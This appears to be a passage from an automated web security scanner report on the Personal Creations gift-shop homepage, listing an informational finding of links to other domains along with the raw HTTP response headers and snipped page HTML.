ed-Photography-Framed-Prints-30019837?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_2.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value='';" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.26. http://www.personalcreations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media

The response contains the following links to other domains:

http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_ALL11_SIT_02.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_FreePersTest_186x47_HeaderMsg.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-0_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-3_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_2.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_4.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_5.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_6.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_8.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_9.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-5_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm
http://link.mercent.com/image.ashx?merchantID=ProFlowers
http://twitter.com/pcgifts
http://www.berries.com/
http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.facebook.com/personalcreations
http://www.linkedin.com/company/personal-creations
http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.providecommerce.com/Careers_Overview.aspx
http://www.providecommerce.com/privacy.aspx
http://www.providecommerce.com/terms.aspx
http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://cdn.mercent.com/js/tracker.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=iejxl5kagemrnvrodr0p4dsq; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=iejxl5kagemrnvrodr0p4dsq; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-2,xtc-1,ttb-3,nte-1,ntc-1,ntb-1,xta-1,trf-1,tpp-3,tbc-1,ntd-1,tvc-2,tmm-2,xtb-1,tnp-2,tpf-1; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:33 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-1,thp-1,txb-2,tks-1,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:33 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=15; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:33 GMT; path=/
Set-Cookie: PCR_BrowserId=4e657082-fa51-47cf-a387-47adad8a3cd1; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:34 GMT
Content-Length: 167245

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<li id="proFlowerLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
